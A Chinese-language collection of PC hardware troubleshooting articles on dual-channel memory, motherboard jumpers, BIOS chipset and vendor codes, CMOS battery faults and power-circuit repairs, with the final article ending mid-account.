Ⅲ题目：哪些主板的芯片组支持双通道内存???
答:Intel、nVIDIA、VIA的芯片组吧
   Intel方面目前主流的是865、875系列
   VIA方面目前在Intel平台是PT880，AMD的32位平台是KT880，64位的是K8T890
   nVIDIA方面目前只有AMD平台的产品，32位的主流是nForce2系列，64位的有nForce3 250和马上大量上市的nForce4系列
Ⅳ题目：什么是内存双通???
答：双通道内存技术，就是在北桥(又称之为GMH)芯片组里制作两个内存控制器，这两个内存控制器是可以相互独立工作的。在这两个内存通道上，CPU可以分别寻址、读取数据，从而可以使内存的带宽增加一倍，数据存取速度也相应增加一倍(理论上是这样)。
    目前流行的双通道DDR内存构架是在两个64bitDDR内存控制器构筑而成的，其带宽可以达到128bit，但工作方式不同于单通道128bit的内存控制技术。因为双通道体系的两个内存控制器是独立的、具备互补性的智能内存控制器，两个内存控制器都能够在彼此间零等待时间的情况下同时运作。例如：当控制器B准备进行下一次存取内存的时候，控制器 A就在读/写主内存，反之亦然。两个内存控制器的这种互补“天性”可以让有效等待时间缩减50%，从而使内存的带宽翻了一翻。
    双通道DDR的两个内存控制器在功能上是完全一样的，并且两个控制器的时序参数都是可以单独编程设定的。这样的灵活性可以让用户使用两条不同构造、容量、速度的DIMM内存条，此时双通道DDR简单地调整到最低的密度来实现128bit带宽，允许不同密度/等待时间特性的DIMM内存条可以可靠地共同运作。
    简而言之，双通道技术是一种关系到主板芯片组的技术，与内存自身无关，只要厂商在芯片内部整合两个内存控制器，就可以构成双通道DDR系统。而主板厂商只需要按照内存通道将DIMM分为Channel 1与Channel 2，用户也需要成双成对地插入内存，就如同RDRAM那样。如果只插单根内存，那么两个内存控制器中只会工作一个，也就没有了双通道的效果了。
    如果只插单根内存，那么两个内存控制器中只会工作一个
    双通道内存控制技术可以非常有效的提高内存带宽，特别是那些需要同内存频繁交换数据的软件和整合有图形核心(整合显卡)的芯片组。在865G这样整合有显卡的双通道主板上，双通道内存控制技术所带来的高带宽，可以帮助整合显卡在划分主存做为显存的时候，得到更高的数据带宽，而显存的数据带宽正是制约一块显卡性能发挥的瓶颈所在。


在集成型主板上安装新声卡

《一键清理系统垃圾》

在集成型主板上安装新声卡

    朋友一台微机，主板集成声卡但却没有声音输出插孔，加之这种声卡不是很好，因而朋友另外购买了一块声卡，请我帮忙安装上去。
        插上新声卡，开机后系统报告找到新硬件，插入驱动盘安装了驱动程序，但任务栏右下角却没有声音图标，声音文件也不能播放。打开“系统属性对话框”，在“设备管理器”中发现新安装的声卡中有好几项前面有“！”标志，查看原主板集成的声卡，已被放在“其它设备”中了，前面都有“？”标志，估计是两种声卡发生冲突。于是一一选中“其它设备”中带有“？”的几项设备，在“属性”对话框中将“在此硬件配置文件中禁用”一项选中。重新启动Win98，进入后仍不能正常发声，再次打开“系统属性对话框”，发现在“声音、视频和游戏控制器”中仍有一项前面有警告标志，“其它设备”中已有三项前面加上禁用标志“×”，但有一项却没有。查看属性，“在此硬件配置文件中禁用”一项已被选中，怎么回事？已经禁用为什么还会有冲突。试着将“声音、视频和游戏控制器”中带有警告标志的一项（即新声卡中的第一项）删除，然后单击“刷新”，结果系统找到新硬件并自动安装了驱动程序，前面的警告标志也没有了，任务栏右边的声音图标出现，播放声音文件也能正常发声了。
        本以为万事大吉，重新启动计算机，正准备离开，却发现启动时应该播放的声音没有发出。回头再次查看任务栏，右边没有显示声音图标。打开“系统属性”对话框，发现“声音、视频和游戏控制器”中这一项前面仍然有警告标志。看来需要手动调整设备冲突了，打开“系统属性”对话框，一一选中“其它设备”中带“？”的几项，在其属性对话框中单击“资源”标签，将“使用自动设置”前的选取标志“√”去掉，调整设备的“输入/输出范围”、“中断请求”和“直接内存访问”地址，使之没有冲突。重新启动后声音仍不能正常播放，但只要将“声音、视频和游戏控制器”中带有警告标志的这一项删除后再重新安装，系统就又能正常播放音乐。但这美妙的音乐在重新启动后就会消失。再次打开“系统属性”对话框，选中“声音、视频和游戏控制器”中带警告标志的这一项，查看其属性，系统却报告设备使用正常，没有资源冲突，真是奇怪了！再仔细观察发现其中“使用自动的设置”一项已被选中，考虑到系统自动设置时可能会造成与原主板集成声卡冲突，于是将“使用自动的设置”前的“√”去掉，再次重新启动，结果声音图标出现，动听的音乐也随之飘扬。将计算机电源关闭后，再次重新启动，一切正常，至此，问题终于得到解决。
        由此可知，主板集成了声卡的计算机再添加声卡时，必须通过手动设置解决资源冲突问题，由于资源有限，一定要将集成的声卡屏蔽掉，且新的声卡中不能使用系统的自动设置。


攒机故障自助手册之主板跳线篇

《一键清理系统垃圾》

攒机故障自助手册之主板跳线篇

    攒机实践中，很多故障令人扑朔迷离。 攒机者大多遇到过这样的问题：机器组装好以后，发现有一些问题。经过仔细排查认证，断定是XX配件的原因，可是将该配件拿到经销商处去换时，一试却没有什么问题。于是，经销商就顺理成章地不予调换，或者和经销商说尽好话，最终经销商答应调换后，回去一试问题仍然存在。这真是令人恼火。
   事实上，攒机过程中遇到的故障，真正配件损坏的情况很少（因为这些配件都是刚买的新货），较多的问题出在我们没有将配件安装妥当、没有将有关配件的跳线设置正确、没注意到配件之间的兼容性等问题上。 根据笔者近十年的攒机实践，总结了攒机故障一些规律性的东西。现将它们整理出来，供大家参考。
   总体来说，当机器出现故障时，我们应该首先检查主板上的跳线是否跳接正确；然后插接上电脑基本五组件（电源、主板、处理器、内存、显示卡），并检查这些配件之间的插接是否良好；如果仍没有什么问题，那么我们再将其他配件一一插接上来试机。以上可称为“三步法”。但是，某些情况下，可能通过“三步法”并不能解决问题，这种情况通常称作疑难杂症，对于它们，我们也有办法对付。
    首先请看第一步—— 主板跳线篇
    如果主板上的跳线跳接得不正确，大多情况下都可能引起没有显示的故障。有些情况下，虽然也显示，但将由此诱发一些问题，例如：机器自检失败、软驱不能启动、机器工作不稳定等。极少情况下也可能暂时没有异常表现，但是却因此留下了严重的隐患，日久可能导致主板、处理器或内存的损坏。因此，我们一定要根据机器的配置首先将主板的跳线跳接正确。
    操作要点：
   (1)根据所使用的处理器类型、处理器上标注的工作电压、外频、倍频等，将主板上的对应跳线跳接正确。
   (2)观察主板上是否有功能未知的跳线，如有的话，一定要将它的作用搞清楚，并正确跳接。
   (3)如果您的内存是168线的，那么要搞清楚它是EDO的还是SD的，因为这两种内存所需的工作电压不同。
   常见的由于主板跳线不对而引发的故障实例：
   例1：一台电脑的基本五组件插接好以后，开机不显示，机箱喇叭无报警的声音。该电脑采用旗舰8STB主板，CY233MX处理器，32MB SDRAM，S364V＋显卡。排查主板跳线时发现：清除CMOS内容的跳线器处于清除CMOS的状态，将其更改为NORMAL状态后，恢复正常显示。 很多主板的清除CMOS内容的跳线如果跳接错误都会引起不显示。少数主板的此跳线即使跳错，也会正常显示，但会提示您重新设置CMOS参数。
   其他可能引起不显示故障的跳线错误，常见的还有：
  1、奔腾系列处理器的类型（P55C/P54C）设置不正确
  常见的处理器中，以下应该按照P55C类型来设置：INTEL公司多能奔腾系列处理器，AMD公司K6、K6－2及后缀字母第二个为H、J、K字母的K5系列处理器，CYRIX公司MⅡ系列、后缀为字母L的6X86系列处理器，IBM公司MX系列处理器。 而以下处理器应该按照P54C类型来设置：INTEL公司奔腾系列处理器，AMD公司后缀字母中的第二个为B、C、F的K5系列处理器，CYRIX公司不带字母后缀L的6X86系列处理器，IDT公司的C6系列处理器。 比如一款AMD的处理器上的标注为AMD－K5－PR100ABQ，由于后缀字母中的第二个为B，故应按P54C来跳接。P54C和P55C处理器的本质差别在于处理器内部和外部的工作电压是否一样。
2、处理器的工作电压未设置正确 此处的工作电压主要指处理器内部的工作电压。常见的处理器的内部工作电压为： INTEL公司的多能奔腾系列处理器为2.8V，奔腾系列处理器为3.5V。CYRIX公司MⅡ系列和IBM公司的MX系列处理器为2.9V，后缀为字母L的6X86处理器为2.8V，6X86处理器为3.5V。 IDT公司的C6系列处理器为3.5V。 AMD公司的K6－2系列处理器以及K6处理器中的K6/300、K6/266处理器为2.2V；K6系列处理器中的K6/166、K6/200为2.9V；K6/233处理器较特殊，它有3.2V和2.2V两个版本，具体要看处理器上的标注；K5系列处理器中后缀字母第二个为K的电压为2.5V，字母为J的电压为2.7V，字母为H的电压为2.9V，后缀字母为B、C、F的电压为3.3V。
  3、处理器的基频和倍频设置不正确（如将不支持100基频的处理器设置成100基频） 常见的处理器中，INTEL公司SLOT1架构的赛扬系列处理器，PⅡ/350档次以下的处理器以及SOCKET7架构的多能奔腾、奔腾系列处理器均使用66MHz基频。 其他公司采用SOCKET7/SUPER 7结构的处理器中，IDT公司的C6/225采用75MHz的基频，AMD公司的K6－2/300档次以上的处理器采用100MHz基频（K6－2/300处理器的某些版本采用66MHz的基频，具体应观察处理器上的标注），K6－2/333采用95MHz的基频，CYRIX/IBM公司的6X86PR200＋、6X86LPR200＋、6X86MX（MⅡ）PR200、6X86MX（MⅡ）PR233处理器中的某些版本采用75MHz的基频（具体应观察处理器上的标注），6X86MX（MⅡ）PR266、6X86MX（MⅡ）PR333处理器中的某些版本采用83MHz的基频以外（具体应观察处理器上的标注），其余的处理器都是采用的66MHz的基频。 需要提请初学者注意的是，CYRIX和IBM公司的处理器上面标注的是“表现值”（英语为“PERFORMANCE－RATING”，简称PR值），而不是处理器实际的工作频率。例如MⅡ233处理器的实际工作频率为200MHz，而不是233MHz。这点，大家在跳线时千万要注意。
   例2：一台电脑的基本五组件插接好以后，开机不显示，机箱喇叭无报警的声音。该电脑采用金鹰VP3主板，CY233MX处理器，32MB SDRAM，S364V＋显卡。检查主板上清除CMOS以及有关处理器类型、基频、倍频、工作电压的跳线设置，均未发现任何问题。后来，逐个检查主板上的跳线，发现在主板大约正中心的位置有一个功能未知的跳线。 查找主板手册，发现机器使用的是AT电源，但跳线却处于ATX状态。将跳线正确设置后，故障消失。
  例3：一台电脑的基本五组件插接好以后，开机提示内存错误。该故障的原因一般为内存本身存在质量问题，此时应该更换内存。
  少数情况下，如果内存的工作电压跳接不对的话，机器也会报告内存错误。大家知道，168线的内存有EDO和SD之分，前者的工作电压为5V，后者的工作电压为3.3V，大多数主板上都有对应的跳线来选择内存使用的电压。如果跳线不正确的话，会损坏内存或者机器报告错误。此例为SDRAM的工作电压误跳成5V所致。
  例4：一台电脑的基本五组件工作正常，但是插接上键盘以后，机器不认键盘。该机主板采用华硕公司的TX97－LE主板，检查发现该主板键盘接口处有一个标注为“KB PWR”的跳线，改变它的状态后，键盘功能恢复正常。
  例5：一台电脑的基本五组件工作正常，接上软驱、硬盘后不认软驱，但是可以识别硬盘。排查时发现同时机器也不认鼠标。该机主板采用的是华硕公司的TX97－E的主板，检查发现在主板的左上角有一个标注为“ONBOARD I/O SEL”的跳线，其状态目前处于“DIS”，改变它的状态使其处于“EN”后，问题消失。
   某些主板上有一些特殊用途的跳线，比如此例中控制板上I/O芯片组是否有效的跳线、前文提到的选择AT/ATX电源的跳线和控制键盘接口电源的跳线，这些跳线在其他主板上一般都没有，所以容易被忽视。因此，建议大家在给主板跳线时，最好逐个将主板上的所有跳线都研究一遍，搞清楚它们的意义，以免疏漏。
   例6：一台电脑的基本五组件插接好以后，显示正常，接上软驱后，发现软驱不能启动。经检查，该机采用的是32MB EDO内存，该内存的工作电压为5V。但是主板上的跳线却选择的是3.3V的电压。改正后，软驱启动正常。
   例7：一台电脑的基本五组件插接好以后，显示正常，接上软驱后，发现软驱不能启动。该机采用金鹰VP3主板，INTEL P5/200MMX处理器，32MB SDRAM，同维9970显卡。经查，内存工作电压无误；换软盘、软驱、软驱线、机箱电源无效；换内存和处理器，问题仍存在。仔细研究主板的跳线，发现其中有一个是用来控制处理器外部电压(总线电压）的。该跳线当前处于CLOSE状态，I/O总线电压为3.3V。将该跳线去掉，使其处于3.5V状态，试机发现故障消失。
   常见的处理器中，使用3.5V外部电压的有：INTEL公司的奔腾处理器、多能奔腾处理器；CYRIX/IBM的6X86（不带字母L后缀）处理器；AMD公司后缀字母第二个为B、C、F的K5处理器，K6/166、K6/200、K6/233处理器；IDT公司C6处理器。 使用3.3V外部电压的有：CYRIX/IBM公司6X86L、6X86MX（MⅡ）处理器；AMD后缀字母第二个为K、J、H的K5及内部电压为2.2V的K6处理器。
   您的主板上如果有选择该电压的跳线，您就要正确跳接。
   例8：一台电脑的基本五组件插接好以后，显示正常，接上软驱后，发现软驱不能启动。该机的配置基本同前例，只不过处理器为CYRIX公司的MⅡ/233。检查发现，该处理器标注的跳线方式为66MHz×3，而当前主板的实际跳线为75MHz×2.5（后经询问，原来这是攒机者按照主板说明书的方法跳接的）。将处理器的基频改为66MHz后，故障排除。 提请大家注意，在主板上跳接有关处理器的跳线时，如果主板的标注和处理器上的标注不一致，那么应该按照处理器上的标注来跳接。
   例9：一台电脑的基本五组件插接好以后，显示正常，接上软驱后，发现软驱不能启动。使用硬盘启动时，启动到出现WIN98的蓝天白云画面后，重新启动。检查发现该机采用的是赛扬333的处理器，本应采用66MHz的基频，但是现在超频使用了100MHz的基频。通过主板上的跳线，将处理器的基频恢复为66MHz以后，故障排除。另请大家注意，某些处理器的基频如果跳接不正确，还可能引起主机不显示。

  如果你有耐心读完了这篇文章，我相信你一定会成为高手！


主板变形导致显卡故障

《一键清理系统垃圾》

主板变形导致显卡故障

《中国电脑教育报》杜学珍

    近日，机房有一台电脑突然不能启动。启动现象为：电脑在自检过程中出现“一长三短”鸣叫。很明显，这是显卡的故障（主板是Award BIOS）。打开机箱，将显卡重新压实。启动电脑，故障依旧。难道是显卡坏了？取下显卡插到别的电脑上，计算机正常启动。又将另一正常显卡插到本机上，现象重现。

    主板出了问题？我用放大镜仔细观察主板的AGP插槽，没有发现异样。为检查是否是接触不料，我将显卡反复拔插多次，分别用不同的力度，使显卡整体和两侧以不同深度插入插槽。当试验到将显卡有接口一端向上微翘的时候，随着一声清脆的短鸣，可爱的蓝天白云终于出现在我面前。后又试验将显卡重新按实，电脑又不能启动。

    找到原因，于是我在安装显卡的时候，在挡板的垫片下垫上约1.5毫米厚的硬纸，上紧螺丝，电脑正常使用。后归纳原因如下：因机房电脑数量成倍扩充，为节约开支，计算机桌子由一个机位改造成两个机位。改造后的机位不能将立式机箱竖放，只得委屈一下将它们平置。但这个平面的一侧有一高2厘米的挡板，使计算机摆放成一个倾斜角度，长期下来，主板发生形变，致使显卡与插槽不能很好接触。看来计算机的摆放并非无足轻重，如果摆放不当，使主板发生形变，会产生各种各样的故障。


主板不加电，真的是主板坏了吗

《一键清理系统垃圾》

主板不加电，真的是主板坏了吗

  我们在维修电脑过程中，总会遇到这样的问题：

    一台电脑按下电源开关后，什么动静也没有，风扇不转，电源指示灯不亮。对于这种情况，我们遇到的多了，先检查电源，再检查主板，采用最小系统化，逐一添加各部件。如果到哪个部件时，出现上述情况，那就说明是这个部件有问题。

    前几天，我就遇到了一起主板不加电的问题，查来查去，电源是好的，主板是好的，竟然CPU是坏的。CPU坏了也能导致主板不加电？

    情况是这样的，一客户送电脑到公司，说是电脑坏了，开不了机。把主机加上电，的确不能开机。先拔下所有电源插头，短路绿线和黑地后，电源工作正常。使用万用表测试各路电压输出，也正常。电源没有问题。

    再采用最小系统法，拔下内存，CPU和显卡，声卡，硬盘，光驱，软驱，只对主板加电。结果按下电源开关后，主板没有任何反应。再强行加电，还是加不上电，主板坏了，太简单了。

    幸好，客户买机器的时间不长，就到仓库为客户更换了一块新板子。三下五去二，我就把机器装好了，接好电源，开机。出乎意料，和刚才情况一下，还是什么动静也没有。

    新主板不可能是坏的？这是怎么回事？

    我仔细检查了主板上的CMOS放电跳线，在“Normal”，没有问题。如果CMOS放电跳线在“Clear”位置时，多数主板不能加电启动，什么反应也没有，就像是主板坏了，除了部分3D主板例外。

    没办法，我就把机器重新拆开，再按最小系统法逐一排除。单独给主板加电，正常，主板没有问题。插上CPU，加电，没有反应。CPU坏了？把CPU插在别的主板上，也不能加电。

    电脑的故障真奇怪，CPU也能短路!

    提示：我们在检修电脑过程中，有时遇到主板上指示灯亮，但是开不了机的情况时，可以强行对主板加电，使用一段带塑料套的导线，直接短路绿黑，使主板不经过开机电路就可以直接供电。如果主机正常启动，说明主板上的开机电路有问题，我们可以通过外接电源开关，直接短路绿黑的应急方法，而不必更换主板，可以省去不少开支。如果主板依旧不加电，只是风扇工作，主机不启动，说明主板的问题比较严重，那就只有更换主板才能解决了。


主板代码的识别

《一键清理系统垃圾》

主板代码的识别

现将一些有关代码列出。

    通常情况下，当显卡的信息过后，显示的便是系统信息了。主板的型号一般在第三行，例如：TRM-P5MVP-A4-V1.01（此例中TRM实际上是主板牌子的缩写，不过有时候也不一定），而最下面一行显示的则是主板的主要信息，例如：07/30/1998/-VP3-586B-W877-2A5LETGAC-00，其中W877是主板采用的I/O芯片型号，接下来的2A5LETGAC才是最重要的信息显示，2A5LE代表主板采用的是VIA Apollo MVP3芯片组，TG是主板厂商代码，此处代表Tekram（建邦），至于AC则代表主板型号。

芯片组代码：

2A69K：Intel 440BX 芯片组
2A69J：Intel 440LX 芯片组
2A69H: Intel 440FX 芯片组
2A59C: Intel Triton FX 芯片组
2A59F: Intel Triton II HX 芯片组
2A59G: Intel Triton VX 芯片组
2A59H: Intel Triton VX 芯片组
2A59I: Intel Triton TX 芯片组
2A59A: Intel Natoma (Neptune) 芯片组
2A597: Intel Mercury 芯片组
2A59B: Intel Mercury 芯片组
2B59A: Intel Neptune EISA 芯片组
2A5C7: VIA VT82C570 芯片组
2A5G7: VLSI VL82C594 芯片组
2A5GB: VLSI Lynx VL82C541/VL82C543
2A5IA: SiS 501/02/03 芯片组
2A5IC: SiS 5501/02/03 芯片组
2A5ID: SiS 5511/12/13 芯片组
2A5IE: SiS 5101-5103 芯片组
2A5IF: SiS 5596 芯片组
2A5IH: SiS 5571 芯片组
2A5II: SiS 5598 芯片组
2A5IK: SiS 5591 芯片组
2A5KB: Ali 1449/61/51 芯片组
2A5KC: 目前未知
2A5KF: ALI 1521/23 芯片组
2A5KI: ALI IV+ M1531/M1543 芯片组 (Super TX 芯片组)
2A5LA: VIA Apollo VP1 芯片组 (VT82C580VP) ( VXPro 芯片组)
2A5LC: VIA Apollo VP2 芯片组 (AMD640 芯片组) 2A5LD: VIA VPX 芯片组 ( VXPro+ 芯片组) 2A5LE: VIA Apollo (M)VP3
2A5L7: VIA VT82C570 2A5L9: VIA VT82C570M
2A5R5: Forex 601A-613 芯片组
2A5UI: Opti 82C822/596/597 芯片组
2A5UL: Opti 82C822/571/572 芯片组
2A5UM: Opti 82C822/546/547 芯片组
2A5UN: OptiViper-M82C556/557/558|Viper 82C556/557/558芯片组
2A5X7: UMC 82C890 芯片组
2A5X8: UMC UM8886BF/UM8891BF/UM8892BF 芯片组
2A4H2: Contaq 82C596-9 芯片组
2A4IB: SiS 496/497 芯片组
2A4KC: Ali 1439/45/31 芯片组
2A4KD: Ali 1489 芯片组
2A4L4: VIA 486A/482/505 芯片组
2A4L6: VIA 496/406/505 芯片组
2A4UK: OPTI-802G-822 芯片组
2A4X5: UMC 8881/8886 芯片组
2C403: EFAR EC802G-B 芯片组
2C4I8: SiS 471B/E 芯片组
2C4I9: SIS 85C471B/E/G 芯片组
2C4K9: ALI 14296 芯片组
2C4J6: 目前未知
2C4L2: VIA 82C486A 芯片组
2C4L6: VIA VT496G 芯片组
2C4UK: OPTI - 802G
2C4X2: UMC UM82C491/82C493 芯片组
2C4X6: UMC UM498F/496F
2A431: Cyrix 5510 芯片组 (MediaGx)

厂商代码：
A0 ASUS（华硕）
A1 Abit(Silicon Star)(升技)
A2 Atrend (中凌)
A3 ASI (Aquarius Systems Inc.)
A7 Arima Twn AB AOpen (建基)
AD Amaquest
AM Mirage
B0 Biostar (映泰)
B3 BCM
C1 Clevo
C2 Chicony
C3 Chaintech (承启)
C5 Chaplet
C9 Computrend
CF Flagpoint
D0 Dataexpert (联讯)
D1 DTK (创宏)
D2 Digital (DEC)
D3 Digicom
D4 DFI（钻石）
E1 ECS (Elitegroup) (磐英)
E3 EFA
E4 ESPCo
E6 Elonex
EC ENPC
F0 FIC (FICA) (大众)
F2 Free Tech
F3 Full Yes (福扬)
F5 Fugutech
F9 Fordlian
FD DataExpert or Atima or GCT (联讯)
FH Amptron
FN Amptron
G0 Giga-byte（技嘉）
G3 Gemlight
G9 Global Circuit Technology
H0 Hsin-Tech
H2 HOLCO (Shuttle)
I3 IWill （艾威）
I4 Inventa
I5 Informtech
J1 Jetway (Jetboard, Acorp) (捷波)
J2 Jamicon
J3 J-Bond（捷波）
J4 Jetta J6 Joss
K0 Kapok
K1 Kamei
L1 Lucky Star
M0 Matra
M2 Mycomp (TMC) and Megastar (皇朝/麦肯)
M3 Mitac
M4 Micro-star（微星）
M8 Mustek
M9 MLE
N5 NEC O0 Ocean (Octek)（海洋）
P1 PC-Chips (明致)
P4 Asus（华硕）
P8 Azza
P9 Powertech
PA Epox (Pronix) (磐英)
PC Pine
Q0 Quanta (Twn)
Q1 QDI（联想）
R0 Mtech (Rise)
R2 Rectron
S2 Soyo (梅捷)
S5 Shuttle (Holco)
S9 Spring Circle
SA Seanix
SC Sukjung (Auhua Electronics Co. Ltd.)
SE SMT (Sundance Multiprocessor Technology Ltd)
SH SYE (Shing Yunn Technology Co., Ltd.)
SM San-Li and Hope Vision SN Soltek (硕泰克)
T0 Twinhead（伦飞）
T1 Taemung or Fentech
T4 Taken
T5 Tyan
T6 Trigen
TB Totem
TG Tekram（建邦）
TJ Totem
TP Commate, Ozzo
U0 U-Board
U2 AIR (UHC)
U6 Unitron
V3 Vtech (PCPartner)
V5 Vision Top Technology
V6 Vobis
V7 YKM (distribution by Dayton Micron)
W0 Wintec (Edom)
Z1 Zida (Tomato boards


主板电池没电引起罕见故障

《一键清理系统垃圾》

主板电池没电引起罕见故障

  一阵电话铃声惊醒了睡梦中的我，原来好友的电脑出问题了：按下电源按钮，电脑没有任何反应，反复按下电源开关仍然无效。经我初步分析，很可能是电源部分出问题了，不是功率不够（劣质电源的“专利”）就是开关出现了短路，心中有数后便拿好各种工具直奔好友的住处。

    的确如好友所述，无论怎么按下电源开关（插座接触良好并验证有电），电脑就像木头人一样“一动不动”。电脑没有任何报警声，主板似乎根本没有加载到所需的电压，电源风扇也不动，看来电脑根本就无法加电。打开机箱仔细查看主板与电源的连接处并没有什么异常，电源开关处也未见短路迹象，随手把其他配件的连线紧了紧，再次开机故障依旧。

    由于电源的“嫌疑”最大，我决定采用替换法来验证，正好手头有一个250W的电源，换装后，电脑仍然“默不作声”；难道这个250W的电源也是“李鬼”？这时我才注意到机箱里装了四个IDE设备：两个硬盘和两个光驱。好友说是刚刚升级的，看来很可能是电源功率超标造成的，我立刻拔下其中两个设备的电源插头，尝试再次开机，电脑依然没丝毫反应。

    正当我准备放弃之际，电脑的电源风扇突然转动起来，随之听到硬盘的自检声，显示器也慢慢变亮了，电脑启动了！但不一会儿，启动中断了，显示“CMOS Load Failure”，并提示按“F2”键继续启动，按“Del”进入BIOS设置，不管它，我按下F2键，让系统继续引导，但无论如何也无法进入Windows XP的桌面，只好重启。这次按“Del”键进入BIOS设置，好友正想输入密码，但却直接进入了，并且在查看中发现系统时间定位在1999年1月1日0时了，很显然CMOS电池没电了。立刻买了一块新的电池装进其中，并接上所有设备再次开机，电脑顺利启动了，但仍然显示“CMOS Load Failure”，只好进入BIOS设置选择“Load BIOS SAFE DEFAULTS”并重启，这次顺利进入了Windows XP桌面，一切恢复如初。就在以为问题已经解决后，好友忽然发现软驱图标不见了，系统没有识别出软驱！开始认为是刚才可能碰松了软驱的连线，于是无奈打开机箱紧了紧，但开机仍然无法看到软驱。冷静下来后，回想到刚才的操作“Load BIOS SAFE DEFAULTS”，是不是默认把软驱设置成“None”了，重启进入BIOS设置，果然证明了我的想法，马上改回来，软驱又能用了。

    回顾整个过程，一切都是小小的CMOS电池惹的祸，看来分析问题不能一味地按照经验走，而应该随机应变，根据具体环境来处理；至于为什么CMOS没电后，电脑突然又能启动，我分析可能是虽然接通电源后电脑没有启动，但电源已经加电给主板，使得主板向CMOS电池充电，待电池电量足以使电脑启动后，便发生了前面的一幕。


主板电路故障修复一例

《一键清理系统垃圾》

主板电路故障修复一例

    朋友对自己的计算机很是爱护，只是每天傍晚让它完成一两个小时的任务，从不搞什么半夜“机”叫。但最近几天，计算机竟然变成工作狂，妄想24小时连轴工作，出现了一插电源线就开机，但无法关机的情况。朋友赶紧给经销商打电话，对方称故障可能源于主板，但由于已经过了保修期，需要支付200元左右维修费。朋友有些舍不得，于是向我求救。

    笔者懂一些浅显的计算机知识，经过分析和测量，我发现原来是主板上的Q2（Q2是个三极管）短路了，所以引起的开机电路故障。为什么Q2短路会使计算机无法关机呢？下面，我结合这款主板的电路图（如图），向大家介绍一下。

    如图，开机前由紫色线向主板的各个芯片提供了多组+5V电压，a点下面的两根插针是Power-On，在开机前a点有3.3V电压，图中中心标记有Winbond的芯片是华邦的I/O芯片，标记为102、103、222、472的小长方行都是电阻，Q1和Q2是主板上的两个三极管。在开机前Q1一直导通，因为Vbe≥0.7V，Vce=0.3，Q2的b极电压由于Q1的导通，被拉低，使Q2的Vbe<0.7V，Vce=VccQ2，Q2处于截止状态。紫色线的+5V供电经过标记为103的电阻到绿线，由于是高电平所以无法导通电源，此时计算机处于关机状态。当触发Power On的时候，a点由紫色+5V提供的+3.3V被拉到地，产生一个低电平，触发I/O的73针，I/O工作，从69针输出一个低电平，通过标记102的电阻到Q1的b极，Q1截止，Q2得以导通，绿线电压被拉到地，变为低电平进入电源，电源工作。以上是正常的开机步骤。而如果电路图中的Q2发生了短路，当用户将主机电源与市电相连的时候，绿线的电压（紫色5V提供）就会被直接拉到地，产生低电平，电源开始工作，但也是因为Q2的短路，促使绿线一直处于低电平状态，所以无论怎样触动Power On，电源都将持续工作，计算机也无法实现关机了。后来，从二手市场花五元钱买到了一个相同型号的三极管（卖家从旧主板上拆下来的），替换后故障排除，工作　　狂可以休息了。：）

    注：三极管的作用是放大、调制、振荡，一般用来作开关用。三极管是电流控制型元件，用字母“Q”表示，一般主板上用的三极管大多是硅管，而硅管又分为NPN型和PNP型，图中Q1、Q2采用的就是NPN型二极管，NPN型二极管的导通状态是Vbe≥0．7V，Vce＝0．3V；NPN型二极管的截止状态是Vbe＜0．7V，Vce＝Vcc。


主板电源导致电脑重启动一例

《一键清理系统垃圾》

主板电源导致电脑重启动一例

近日一位朋友送来一台电脑，基本配置为：Intel M612主板，赛扬300 CPU，杂牌声卡和一个4MB的AGP显卡。
        故障现象：
        当打开电脑的外接电源时，有时还未按机箱的启动开关，电脑就启动（偶尔发生）。此外电脑在使用过程中，在没有发出任何警告的情况下，也会突然重新启动，并且音箱发出的声音中夹杂着明显的杂音。
        故障查找
        如果是硬件设置冲突而造成故障，那么电脑应该发出出错警告。通过重新安装系统，电脑的故障并没有排除；又对系统进行了杀毒处理，没有发现病毒；仔细检查了计算机的CMOS设置情况，也正常。
        通过现象来看，初步判断故障是由某个硬件接触不良造成的。本着先易后难的原则，先看机箱内部，发现机箱内部的清洁非常好，基本上没有灰尘。接着断开光驱、软驱、取下声卡，显卡查看金手指和主板上相对应的插槽，末发现接触不良或金属杂物引起插口内部短路的现象。这时音箱的电流杂音引起了我的注意。断开音箱，换上耳机，电流杂音还是很大，看来不是喇叭的原因，查看声卡说明书得知，该声卡是采用硬波表技术的PCI声卡，虽是杂牌，但声音输出质量不至于如此低。那么电流杂音又是来自何方呢？上述故障现象之间又有什么联系呢？
        既然喇叭里有电流杂音，那么就先从电源下手，拆开电源，使用万用表测量，电流、电压输出正常，再拔下主板上电源输入插头，这时惊奇地发现插在主板上的电源插头第二排右数第1、2号金属插线柱有明显被电弧烧过的痕迹，并使两根金属插线有轻微粘结的现象。
        故障分析
        由于电源到主板上的接头被烧过，虽未形成断路，但造成接口处内阻增大，实际输入到计算机主板上的电压、电流不足，特别是计算机CPU部件在进行大量数据运算时，所需电压、电流就更大。主板得不到足够而稳定的电压和电流，于是系统发生了重启动现象。主板内的电压和电流不稳定，干扰了声卡的正常运行，使声音输出中夹杂有电流杂音。又由于电源输入插头的金属插线柱有轻微的粘结现象，当两个插线柱未接通时，计算机启动正常，当两个插线柱接通并形成短路时，打开外部电源，计算机错误认为启动钮已接通，于是计算机发生了自行启动的现象。
        经验和教训
        上述故障是由于朋友在清理机箱内部灰尘时，未将主板上的电源插口插紧而造成的。因此希望各位朋友在插主板电源插头时一定要插紧。
        故障处理
        由于该机基本上能使用，估计计算机的电源没有大的问题，故使用工具将金属插线柱上的氧化层细细清除干净，确保接触良好，并使用一张纸片卡在两个插头之间，防止插线柱再次接触，插上插口，启动计算机，通过长时间运行，计算机运行稳定，故障排除。


主板短路也可维修

《一键清理系统垃圾》

主板短路也可维修

    故障现象：好友前段时间将主板拆下来清扫，等再装上去的时候忘了开关和复位键那排插针是怎么插的了，他就用铜钥匙在那排插针上扫了一下，只见火花一闪，主板就再没有动静了。

    故障解决：笔者根据朋友描述的现象分析应该是电源开关或Reset键有问题？笔者把那些插头都给拔了下来再用金属片短路主板上开关插针，还是没有动静。笔者再把电源给拆下来换上笔者的好电源，可是故障依旧。

    笔者把主板从机箱里拆了出来，卸下内存和CPU，使用“主板诊断卡”来诊断。把“诊断卡”插在主板扩展槽上给主板通电，“诊断卡”上没有任何反应。笔者决定对主板进行强制上电，在电源主插头上有卡扣的那面有根绿色的线（有的是灰色的），将它与旁边的黑色的线短接起来电源就被启动了。笔者在主板背面找到绿线连接着的那根插针，用镊子把它和旁边的连接黑线的那根插针短接在一起，在电源接通的一瞬间“诊断卡”上的电源指示灯闪了一下，看来是主板某处短路而使电源保护装置动作。

